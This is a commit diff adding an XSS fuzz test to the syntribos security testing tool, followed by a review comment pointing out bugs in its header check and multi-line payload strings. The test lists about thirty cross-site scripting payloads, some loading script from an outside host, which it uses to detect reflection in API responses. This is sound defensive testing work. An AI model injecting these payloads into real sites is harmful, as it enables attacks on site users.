
XSS Body Test

Change-Id: Iec74ad6a537e798648a39536f23e119bff1fcc1b
Greg Anderson 3 years ago
parent
commit
1658f6f9e1
2 changed files with 83 additions and 1 deletions
  1. 1
    1
      syntribos/tests/fuzz/xml_external.py
  2. 82
    0
      syntribos/tests/fuzz/xss.py

+ 1
- 1
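--- a/syntribos/tests/fuzz/xml_external.py
+++ b/syntribos/tests/fuzz/xml_external.py
@@ -49,7 +49,7 @@ class XMLExternalEntityBody(base_fuzz.BaseFuzzTestCase):
                   text=("A string known to be commonly returned after a "
                         "successful XML external entity attack was included "
                         "in the response. This could indicate a "
-                        "vulnerability to XML entity attacks attacks."),
+                        "vulnerability to XML entity attacks."),
                   assertions=self.data_driven_failure_cases()))
         self.test_issues()
 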

+ 82
- 0
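--- a/syntribos/tests/fuzz/xss.py
+++ b/syntribos/tests/fuzz/xss.py
@@ -0,0 +1,82 @@
+"""
+Copyright 2016 Rackspace
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+   http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+"""
+
+from syntribos.issue import Issue
+from syntribos.tests.fuzz import base_fuzz
+
+
+class XSSBody(base_fuzz.BaseFuzzTestCase):
+    test_name = "XSS_BODY"
+    test_type = "data"
+    data_key = "xss.txt"
+    failure_keys = [
+        """<SCRIPT>alert('XSS');</SCRIPT>""",
+        """<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
+        """<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
+        """<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
+        """<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
+        """<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
+        """<IMG SRC="javascript:alert('XSS');">""",
+        """<IMG SRC=javascript:alert('XSS')>""",
+        """<IMG SRC=JaVaScRiPt:alert('XSS')>""",
+        """<IMG SRC=javascript:alert(&quot;XSS&quot;)>""",
+        """<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>""",
+        """<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>""",
+        """<IMG DYNSRC="javascript:alert('XSS')">""",
+        """<IMG LOWSRC="javascript:alert('XSS')">""",
+        """<DIV STYLE="background-image: url(javascript:alert('XSS'))">""",
+        """<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">""",
+        """<DIV STYLE="width: expression(alert('XSS'));">""",
+        """<META HTTP-EQUIV="refresh"
+        CONTENT="0;url=javascript:alert('XSS');">""",
+        """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,
+        PHNjcmlwdD5hbGVydCgnWFNJyk8L3NjcmlwdD4K">""",
+        """<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>;
+        REL=stylesheet">""",
+        """<META HTTP-EQUIV="refresh" CONTENT="0;
+        URL=http://;URL=javascript:alert('XSS');">""",
+        """<STYLE TYPE="text/javascript">alert('XSS');</STYLE>""",
+        """<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE>
+        <A CLASS=XSS></A>""",
+        """<STYLE type="text/css">
+        BODY{background:url("javascript:alert('XSS')")}</STYLE>""",
+        """<BASE HREF="javascript:alert('XSS');//">""",
+        """<OBJECT TYPE="text/x-scriptlet"
+        DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>""",
+        """<OBJECT classid=clsid:ae24fdae-03c6-8b6-80c44f3>
+        <param name=url value=javascript:alert('XSS')></OBJECT>""",
+        """<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>"""]
+
+    def data_driven_failure_cases(self):
+        failure_assertions = []
+        if self.failure_keys is None:
+            return []
+        for line in self.failure_keys:
+            failure_assertions.append((self.assertNotIn,
+                                       line, self.resp.content))
+        return failure_assertions
+
+    def test_case(self):
+        if 'html' in self.resp.headers:
+            self.register_issue(
+                Issue(test="xss_strings",
+                      severity="High",
+                      text=("A string known to be commonly returned after a "
+                            "successful XSS attack was included "
+                            "in the response. This could indicate a "
+                            "XSS vulnerability"),
+                      assertions=self.data_driven_failure_cases()))
+            self.test_issues()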
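Review bot: The guard `if 'html' in self.resp.headers:` in test_case tests whether a header *named* `html` exists rather than whether the response body is HTML, so if `resp.headers` is a mapping of header names (as for a requests-style response) the XSS assertions would presumably never be registered; the intended check looks like `if 'html' in self.resp.headers.get('Content-Type', ''):`. Several failure_keys entries (the META, STYLE and OBJECT payloads split across two lines) are triple-quoted literals that therefore carry an embedded newline plus eight spaces of indentation, which a reflected payload will not contain, so those needles can never match; joining the halves with implicit string concatenation of adjacent literals keeps the lines short without changing the needle. In data_driven_failure_cases the `failure_keys is None` check comes after the list is already created and, since the class attribute here is always a list, could move first or be dropped. The Issue text also says the string is "returned after a successful XSS attack" while the assertions check for verbatim reflection of the injected payload, and "a XSS" should read "an XSS".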
